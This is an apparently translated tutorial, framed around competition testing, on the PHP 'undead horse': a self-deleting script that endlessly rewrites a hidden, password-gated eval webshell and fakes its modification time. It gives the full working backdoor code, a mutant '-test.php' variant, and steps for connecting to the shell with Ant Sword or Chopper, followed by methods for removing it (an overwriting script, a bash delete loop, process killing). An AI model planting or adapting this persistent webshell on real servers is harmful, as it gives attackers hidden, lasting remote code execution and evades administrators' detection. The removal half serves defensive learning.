The immortal horse is a memory horse. It will be written into the process and generate Trojan files in the specified directory indefinitely.
Here is the PHP Immortal Horse as an example
Test code:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.test.php';
$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .test.php');
usleep(5000);
}
?>
The above code is the simplest undead horse. Its purpose is to create a PHP file named “.test.php”. This file contains a backdoor with password verification, allowing the execution of arbitrary PHP code.
Detailed explanation about the code:
1. ignore_user_abort(true);
Set up a PHP script to ignore user aborted connections so that the script will continue executing even if the user stops loading the page in the browser.
2. set_time_limit(0);
Setting the script execution time limit to 0 means that the script can run indefinitely without being interrupted by PHP’s execution time limit.
3. unlink(__FILE__);
Deletes the currently executing PHP script file, an attempt to hide the script from discovery.
4. $file = ‘.test.php’;
Define a variable $file, which contains the name of the file to be written, namely “.test.php”.
With . at the beginning of the file, it will become a hidden file
5. $code = ‘‘;
Define a variable $code, which contains PHP code. This code first checks whether the MD5 hash value of the “pass” parameter passed through the GET request is equal to “098f6bcd4621d373cade4e832627b4f6”. If the verification is successful, it attempts to execute the file named “test” passed through the POST request. PHP code.
6. while (1){…}
This is an infinite loop that will keep doing the following:
a. file_put_contents($file, $code);
Write the $code defined above into the file $file, that is, “.test.php”, so that the file content can be continuously updated.
b. system(‘touch -m -d “2018-12-01 09:10:12” .test.php’); –
Using the system function, it will execute the system command touch to modify the modification time of the “.test.php” file to “2018-12-01 09:10:12”, which can spoof the last modification time of the file. to prevent detection.
c.usleep(5000);
Wait for 5 milliseconds and then continue looping. This sleep operation is to reduce the resource consumption of the script and avoid abnormal behavior being detected by the system.
Among them, 098f6bcd4621d373cade4e832627b4f6 is the encrypted md5 value. The reason for encryption is to prevent our Trojan from being used by other teams. This is just for testing. The content before encryption is test
Access the PHP file after uploading it
After accessing, an undead horse hidden file named .test.php will be generated in this path in a loop.
Use Ant Sword or Chopper to connect to the generated webshell:
http://path to the file/.test.php?pass=test
Connection password: test
Try to delete the file and you will find that it cannot be deleted. This is a dead horse because it has been written to the process.
You can’t find it using commands like ls and ll. As we said in the previous code, it will be automatically deleted.
You can only find it by looking at the newly added files
find ./ -cmin -30 #View files created within 30 minutes
Or unless you know the name of this immortal horse, you can also use the find command to search (./ means in the current directory)
Approach:
1. Write a file with the same name to restrain the undead horse
Test code:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.test.php';
$code = 'come on!';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .test.php');
usleep(1000);
}
?>
Note: usleep time must be shorter than the immortal horse. Just change $code to harmless content.
Assuming the file is named killshell.php, upload the file and access it
Note: You must access it first to trigger writing to the file.
I tried to connect to the webshell again and found that the connection was no longer possible and the returned data was empty.
View the contents of webshell on the server
As you can see, the content is no longer a one-sentence Trojan, but has become harmless content that we will write later.
2. Use conditional competition to kill undead horses
Test code:
This is a bash script
#!/bin/bash while true do #kill -9 process ID rm -rf .test.php done
If you can find the process ID of the undead horse, you can also use the kill command and the rm command at the same time.
Use the command top | grep httpd to query or ps aux to list all processes and find the process to be killed.
Create a new killing script
vim rmshell.sh
Add highest permissions
chmod 777 rmshell.sh
Continuously run the script in the background
nohup ./rmshell.sh &
I checked the Undead Horse again and found that it no longer existed.
Just check it out
Expansion: Mutant Undead Horse
The Trojan written here starts with – instead of .
In the Linux command line, commands use – when appending parameters. Therefore, if a command is executed on a file named in this way, the file will be executed as a parameter. Without this parameter, an error will be reported, so that the command cannot be executed. This immortality is executed immediately, but the disadvantage is that the concealment is not as good as those starting with.
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '-test.php';
$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" -test.php');
usleep(5000);
}
?>